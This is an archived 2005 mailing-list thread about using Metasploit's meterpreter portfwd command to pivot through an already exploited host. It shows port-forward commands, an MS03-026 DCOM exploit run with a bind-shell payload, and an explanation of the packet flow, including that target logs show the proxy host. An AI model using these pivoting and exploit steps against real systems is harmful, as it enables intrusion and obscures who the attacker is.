use of meterpreter (copy for the list )

[thomas.werth at vahle.de (Thomas Werth)]

Just took a second try, but i'm still doing something wrong :(
Here's "the log" :

1. Hacking "proxy Host"
2. setting up portforwarding
meterpreter> portfwd -a -L 127.0.0.1 -l 9000 -h 'NextTargetIP' -p 135
portfwd: Successfully created local listener on port 9000.
meterpreter> portfwd -a -L 127.0.0.1 -l 5555 -h 'NextTargetIP' -p 5555
portfwd: Successfully created local listener on port 5555.
meterpreter> portfwd -v
Local port forward listeners:

  127.0.0.1:9000 <-> 'NextTargetIP':135
  127.0.0.1:5555 <-> 'NextTargetIP':5555
3. Launching another instance of metasploit and prepare next exploit

Exploit and Payload Options
===========================

  Exploit:    Name      Default      Description
  --------    ------    ---------    ------------------
  required    RHOST     127.0.0.1    The target address
  required    RPORT     9000         The target port

  Payload:    Name        Default    Description
  --------    --------    -------
------------------------------------------
  required    EXITFUNC    thread     Exit technique: "process",
"thread", "seh"
  required    LPORT       5555       Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Got connection from 127.0.0.1:32772 <-> 127.0.0.1:5555

[*] Exiting Bind Handler.

maybe i setup proxy for listen Port wrong or something else ?
What do i have to fix ?


Thomas Werth schrieb:
> i'll try it out as soon as possilbe.
> Thank you very much for yor very very good explanation !
> Maybe some kind of this could be put into meterpreter.pdf so furhter
> questions of this type won't come up :)
>
> thx
>
> mmiller at hick.org schrieb:
>
> > On Thu, Apr 14, 2005 at 10:14:56AM +0200, Thomas Werth wrote:
> >
> >
> > > Lets see if i understand correctly :
> > > Exploiting another host and using meterpreter is first i do.
> > > Now the portfwd of meterpreter isn't running on victims host, instead it
> > > is running on "my" host, correct ?
> >
> >
> > Sort of.  The "listener" is running on your local machine.  When you
> > connect to the local port, the meterpreter client that is running on
> > your machine talks to the meterpreter server that is running on the
> > machine you exploited and asks it to open a TCP connection to the remote
> > host and port that you specified with your port forward on your behalf.
> > The result acts just like a normal port forward.  I'll describe the
> > packet flow at the end of this message [1].
> >
> >
> >
> > > Now i setup portforwading using localhost and next desired target-ip.
> > > When now running attack based on proxy protforwading does it job and
> > > exploit should work , correct ?
> >
> >
> > Yep -- it should be entirely transparent.
> >
> >
> >
> > > Now my question for better understanding :
> > > As portforwading is running on my host and target ip is different from
> > > "proxy Host" why do i need to exploit the proxy host as it seems to me
> > > this host isn't needed when using localhost and next target ip for
> > > "proxy attack " ? How is the "flow of packets" ?
> >
> >
> > I think there's a disconnect here.  While there is a "listener" running
> > on your machine, it is not your machine that actually establishes the
> > connection to the target machine.  Instead, the meterpreter server
> > instance that is running on the machine you exploited is what is
> > responsible for actually establishing the connection to the target
> > machine.  This is what allows you to pivot onto other networks that you
> > would otherwise not be able to access directly.
> >
> >
> >
> > > In case of logging on "next target host" which attacker ip will be logged ?
> >
> >
> > The address of the 'ProxyHost' from your previous example is what will
> > be seen as the requestor address by the 'next target host'.
> >
> > [1] If you're familiar with SSH tunnels then this should make sense.
> > This step-by-step demonstrates establishing a connection from your machine
> > (123.0.0.1) through a firewall (10.0.0.1) to an internal machine
> > (10.0.0.254) on port 22:
> >
> > 1. A listener is set up on 127.0.0.1:4444 on your client machine.
> > 2. You telnet to 127.0.0.1:4444, causing the meterpreter client on your
> >   machine to send a message (network_open_tcp_channel) with the target
> >   information of 10.0.0.254:22
> > 3. The firewall (10.0.0.1) then establishes a TCP connection to
> >   10.0.0.254 on port 22.  Once the connection is established, the
> >      meterpreter server running on the firewall sends a response with a
> >      unique channel identifier to the meterpreter client running on your
> >      machine.
> > 4. When you send data through telnet, the meterpreter client reads it in
> >   and encapsulates it in a message (core_channel_write) that is sent 
> >      using the unique channel identifier that the client and server agreed
> >      on.
> > 5. When the server receives the core_channel_write request, it
> >   decapsulates the data and transmits it to the TCP connection that is
> >      established with 10.0.0.254 on port 22.
> >
> > Steps 4 and 5 are exactly the same when it comes to data originating on
> > the server side that needs to be sent to the client.
> >
> > 6. When you close telnet, a message (core_channel_close) is sent from
> >   the meterpreter client to the server which causes the server to close
> >      the TCP connection with 10.0.0.254:22.
> >
> > Hope that helps!

-- 
MFG
Thomas Werth

Tel.: 02307 / 704 - 366
---------------------------------------------------------------------

Paul Vahle GmbH & Co. KG              URL       : http://www.vahle.de
Westicker Strasse 52  D-59174 Kamen   E-Mail    : thomas.werth at vahle.de
---------------------------------------------------------------------